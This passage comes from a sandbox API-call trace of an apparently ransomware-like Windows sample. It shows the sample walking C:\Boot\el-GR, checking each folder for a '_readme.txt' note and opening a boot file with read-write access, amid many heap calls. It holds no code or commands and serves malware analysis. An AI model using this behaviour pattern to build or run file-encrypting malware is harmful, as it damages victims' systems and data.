ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.158] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.158] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.158] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.158] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0058.158] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.158] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.158] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.158] PathFindFileNameW (pszPath="") returned="" [0058.158] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.158] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.159] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.159] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0058.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.159] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5d1d0 [0058.159] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0058.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.159] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0058.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.159] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.160] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.160] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.160] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0058.160] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.160] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaad5d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.160] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned=".txt" [0058.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.160] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaad5d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.160] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.160] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.160] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 